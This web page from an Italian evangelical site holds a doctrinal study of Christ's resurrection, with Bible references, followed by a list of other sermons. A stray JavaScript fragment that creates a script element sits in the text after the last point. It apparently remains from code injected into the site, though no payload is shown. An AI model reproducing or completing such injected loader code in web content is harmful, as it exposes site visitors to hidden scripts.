LA RESURREZIONE

INTRODUZIONE: 

Molti vogliono inserire in questo soggetto dottrinale anche le “ipotesi” o le “analisi” relative al ministero di Cristo durante le ore della morte; noi pensiamo che esso prescinde totalmente dall’argomento, mentre invece, può essere considerato pertinente quello della durata della morte.  Matteo 12:40, 10:34; Luca 9:22, 24:46, 18:33; l Corinzi 15:4. Versi tutti che parlano del terzo giorno, ci parlano di tre giorni e tre notti.

Storicamente (dai Vangeli) si può concludere che non sono state 72 ore, ma forse la metà (solo il sabato è stato completo) ed infatti anche la prima letteratura cristiana, per esempio “Il credo: Il terzo giorno…”, non parla di tre giorni e tre notti.

Sono state date molte spiegazioni:

1)    il raffronto con l’episodio di Giona vuole essere figurativo e come per le parabole, più dei particolari propone l’argomento;

2)    la dizione “giorno e notte”, rappresenterebbe una forma idiomatica (simile alla nostra: una giornata), che non sempre si riferisce alla totalità del giorno ma semplicemente alla sua successione astronomica;

3)    qualcuno ha anche avanzato l’ipotesi, che a noi sembra ardita, che Gesù si sia riferito anche al periodo precedente alla sua morte, quando moralmente è sceso nelle parti più basse dell’annichilimento (Filippesi 2:8).

Chiusa questa parentesi introduttiva, entriamo nel vivo dell’argomento.

1-  ASPETTO STORICO DELLA RESURREZIONE.

a)   La resurrezione non ha avuto testimoni (Marco 16:3,4).

Nota: Quando affermiamo che la resurrezione di Cristo è un episodio storico solidamente provato, affermiamo una verità incontrovertibile; ma quando parliamo dei testimoni della resurrezione, dobbiamo precisare che essi hanno verificato oggettivamente un fatto già verificatosi e quindi hanno reso una testimonianza assolutamente valida.

b)   La rimozione della pietra avvenne quando la resurrezione di Gesù era già verificata (Matteo 28:2).

c)    Le condizioni nell’interno della tomba, sembrano parlare di un sereno risveglio e di un corpo, ormai glorificato, che si sottrae da quelli che sono stati prima i suoi necessari rivestimenti (Giovanni 20:5,7).

Nota: Sembra che Dio abbia riservato per Se alcuni atti del ministero di Cristo: l’ingresso nell’umano (Matteo 1:18) e l’uscita dall’umano…

Quindi non “guardie che cadono a ritroso…”, l’immagine tanto cara all’iconografia cattolica, e non discepoli che vedono un corpo che riacquista vita, ma un atto divino che è potenza di resurrezione e trasforma un corpo, da una dimensione fisica, sottoposta alle leggi naturali, ad un corpo spirituale che può usare o superare quelle leggi: Gesù nelle apparizioni, di volta in volta, partecipa a comportamenti umani e manifesta proprietà spirituali: si fa toccare, mangia,… entra a porte chiuse, scompare ecc.;

d)   Le successive apparizioni (l Corinzi 15:5).

Note: Delle apparizioni parleremo specificatamente in seguito.

 2-  SIGNIFICATO SOTERIOLOGICO DELLA RESURREZIONE.

a)   Manifestazione della potenza vittoriosa nel piano della Redenzione. (Efesi 1:19, 20).

Nota: la resurrezione è stata definita la Waterloo dell’inferno (Napoleone non è morto, ma i suoi sogni e le sue ambizioni sono sepolti). Per questo Paolo parla con una successione di aggettivi sembrano “classificare” la potenza della Resurrezione, trasferita in retaggio alla chiesa.

b)   Affermazione esplicita e definitiva della divinità di Cristo (Romani 1:4).

Nota: La morte di Cristo è prova della sua umanità, la resurrezione quella della sua divinità (Giovanni 2:19).

c)    Compimento nel tempo del piano della Redenzione (Romani 4:25).

Nota: Quando, per fede, c’identifichiamo con Cristo crocifisso, accettiamo, nel Suo sacrificio compiuto per noi, la liberazione dalla condanna dal peccato. Quando c’identifichiamo nella Sua resurrezione (Colossesi 3:1) accettiamo pienamente quella nuova condizione che è assenza di presenza e potenza del peccato;

d)   Dimostrazione della Resurrezione, come presente in Cristo. (Giovanni 11:25).

Nota: Risposta celeste a coloro che come Marta concepiscono Cristo soltanto in relazione al passato (se fossi stato qui) o al futuro (So che resusciterà). Gesù era già resurrezione: Egli è l’eterno presente (Ebrei 13:8): Io sono con voi.

e)   Inizio dell’ultimo atto della grazia: la resurrezione è la glorificazione. (I Corinzi 15:20).

Nota: Le molte resurrezioni ricordate dalla Bibbia, sia nell’antico che nel nuovo Testamento, sono semplicemente un temporaneo ritorno alla vita fisica; quella di Cristo è la Resurrezione nella sua pienezza (Apocalisse 1:18; Romani 6:9).

f)     La manifestazione di ciò che saranno i credenti (l Giovanni 3:2; Colossesi 3:4; I Corinzi 15:23).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Sermone di Roberto Bracco:  “Sono nati da Dio” – Giovanni 1:1-14″ “ma a tutti coloro che lo hanno ricevuto, egli ha dato l’autorità di diventare figli di Dio, a quelli cioè che credono nel suo nome, i quali non sono nati da sangue, né da volontà di carne, né da volontà di uomo, ma sono nati da Dio. ” …
Leggi Tutto

SAREMO SIMILI A LUI

di MW. B. RILEY   –  Paolo scrisse: “Ma dirà qualcuno: Come risuscitano i morti, e con quale corpo verranno? Stolto! Quello che tu semini non è vivificato, se prima non muore.  E quanto a quello che semini, tu non semini il corpo che ha da nascere, ma un granello ignudo, che può essere di frumento o di qualche altro seme. E Dio gli dà un corpo come ha …
Leggi Tutto

RISVEGLIATI ….

da un sermone predicato dal past. Agostino Masdea  nella chiesa di via Anacapri nel 1998. i) E’ un appello che lo Spirito rivolge oggi alla Chiesa. E’ un appello per questo tempo indirizzato a ogni singolo credente. E’ una necessità impellente per il popolo di Dio, ed è una esigenza improrogabile per la vita della chiesa. E la parola dell’Eterno fu rivolta a Giona, figlio di Amittai, dicendo: “Lèvati …
Leggi Tutto

DIARIO DI UN VIAGGIO IN ANGOLA

di Agostino Masdea.  Una delegazione dell’A.M.E.N, Agenzia Missionaria Evangelo per le Nazioni, si è recata in Angola per inaugurare, nel centro Beniamino di Funda, nella provincia di Cacuaco, un panificio (“padaria” in portoghese), che consentirà la produzione di pane per I bambini e i ragazzi della scuola del centro. La delegazione era composta da alcuni pastori, membri del consiglio nazionale dell’AMEN, tra cui il presidente Remo Cristallo, il …
Leggi Tutto

UN MOTIVO PER RALLEGRARSI

di R. Carmicheal   –   Il Signore ha dei piani meravigliosi per il vostro futuro. Forse voi vi chiedete come io possa affermare una cosa del genere giacché probabilmente non ci siamo mai incontrati. Beh, quest’affermazione la poggio non tanto sulla conoscenza della vostra (o della mia) persona, ma sulla conoscenza del Signore. Non importa in quale situazione vi troviate – che sia meravigliosa o terribile. Il Signore ha …
Leggi Tutto

BIOGRAFIE: GEORGE MULLER

George Müller nacque in Prussia il 27 settembre 1805 e venne allevato nella cittadina di Heimersleben, dove suo padre era un esattore delle tasse. Benché questi provvedesse generosamente per lui, George rubava soldi in continuazione e ne spendeva la maggior parte in donne e birra. Può apparire strano il fatto che decidesse di studiare teologia all’università di Halle, conoscendo un po’ il suo carattere irreligioso, ma a quel tempo …
Leggi Tutto

Argomenti Biblici

LA FEDE

LA FEDE

da un sermone di Smith Wigglesworth  -  «Per fede Abele offerse a Dio un sacrificio più eccellente che Caino… per fede Enoch fu trasportato per non veder la morte... per ...
Leggi Tutto
Calvario

Calvario

di John Charles Ryle  -  Probabilmente saprete che il Calvario era un posto poco fuori Gerusalemme, dove il Signore Gesù Cristo, il Figlio di Dio, fu crocifisso. Sul Calvario non ...
Leggi Tutto
La tua parola mi ristora

La tua parola mi ristora

di N.A. WOYCHUK  -  Il Dr. R. A. Torrey disse: “Vi è più potenza in questo libro, per la salvezza degli uomi­ni, per la loro purificazione, per rallegrare e rendere ...
Leggi Tutto
LA PACE E’ POSSIBILE!

LA PACE E’ POSSIBILE!

di J. F. Walvoord   -  Desideriamo la pace nel mondo.  Ai nostri giorni sono pochi i quesiti che ci inducono a meditare, certamente non tanto quanto la domanda: E’ ...
Leggi Tutto
CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

«Il calice della benedizione che benediciamo, non è la comunione col sangue di Cristo? Il pane che noi rompiamo, non è la comunione col corpo di Cristo? Siccome vi è ...
Leggi Tutto
L'UNICA VIA

L’UNICA VIA

di OSWALD J. SMITH - Un banchiere ed un industriale sedevano l'uno di fronte all'altro negli uffici della banca. L'industriale parlava molto animatamente, quando all'improvviso l'altro interruppe. "Ridicolo! Assurdo! Pazzesco!" esclamò l'orgoglioso ...
Leggi Tutto

Dai nostri Culti